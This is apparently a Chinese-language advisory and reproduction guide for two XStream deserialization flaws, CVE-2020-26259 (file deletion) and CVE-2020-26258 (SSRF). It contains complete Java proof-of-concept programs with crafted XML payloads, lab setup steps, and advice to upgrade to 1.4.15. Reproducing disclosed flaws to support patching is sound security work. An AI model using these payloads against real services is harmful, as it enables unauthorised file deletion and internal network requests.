1.漏洞描述
XStream是一个常用的Java对象和XML相互转换的工具。在运行XSteam的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成任意文件删除/服务端请求伪造(SSRF) 。
2.影响版本
XStream <= 1.4.14
3.漏洞POC
1)cve-2020-26259:任意文件删除
import com.thoughtworks.xstream.XStream;
/*
CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host
when unmarshalling as long as the executing process has sufficient rights.
https://x-stream.github.io/CVE-2020-26259.html
Security framework of XStream not explicitly initialized, using predefined black list on your own risk.
*/
public class cve_2020_26259 {
public static void main(String[] args) {
String xml_poc = "<map>\n" +
" <entry>\n" +
" <jdk.nashorn.internal.objects.NativeString>\n" +
" <flags>0</flags>\n" +
" <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
" <dataHandler>\n" +
" <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
" <contentType>text/plain</contentType>\n" +
" <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>\n" +
" <tempFile>D:/test.txt</tempFile>\n" +
" </is>\n" +
" </dataSource>\n" +
" <transferFlavors/>\n" +
" </dataHandler>\n" +
" <dataLen>0</dataLen>\n" +
" </value>\n" +
" </jdk.nashorn.internal.objects.NativeString>\n" +
" <string>test</string>\n" +
" </entry>\n" +
"</map>";
XStream xstream = new XStream();
xstream.fromXML(xml_poc);
}
}
2)cve-2020-26258:服务端请求伪造(SSRF)
import com.thoughtworks.xstream.XStream;
import java.io.IOException;
public class cve_2020_26258 {
public static void main(String[] args) throws IOException {
String payload = "<map>\n" +
" <entry>\n" +
" <jdk.nashorn.internal.objects.NativeString>\n" +
" <flags>0</flags>\n" +
" <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
" <dataHandler>\n" +
" <dataSource class='javax.activation.URLDataSource'>\n" +
" <url>http://127.0.0.1:8000/ntuser.ini</url>\n" +
" </dataSource>\n" +
" <transferFlavors/>\n" +
" </dataHandler>\n" +
" <dataLen>0</dataLen>\n" +
" </value>\n" +
" </jdk.nashorn.internal.objects.NativeString>\n" +
" <string>test</string>\n" +
" </entry>\n" +
"</map>";
XStream xStream = new XStream();
xStream.fromXML(payload);
}
}
4.漏洞复现
1)https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.10-java7/
下载xstream1.4.10版本
2)使用IDE创建一个maven工程,命名xstream,会生成pom.xml文件,将pom.xml文件内容替换成下面的代码
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>xstream</artifactId>
<version>1.0-SNAPSHOT</version>
<dependencies>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.14</version>
</dependency>
</dependencies>
</project>
3)将下载的xstream文件放入xstream目录下
4)选中工具中的java文件夹,右键->new->Java Class,命名为cve_2020_26258,将cve_2020_26258的POC拷入文件
5)输入python3 -m http.server 8000开启本地8000端口,在IDE工具界面右键选择run ‘cve_2020_26258main()’,会访问到POC中的ntuser.ini文件
6)创建cve_2020_26259,将cve_2020_26259的POC拷入文件
7)在IDE工具界面右键选择run ‘cve_2020_26259main()’,会删除在D盘下的test.txt文件
5.修复建议
更新xstream版本。如果是maven管理的项目,直接修改pom.xml中的依赖,修改xstream版本为1.4.15即可,如何是其他方式的,请自行从官网下载使用。
地址:http://x-stream.github.io/download.html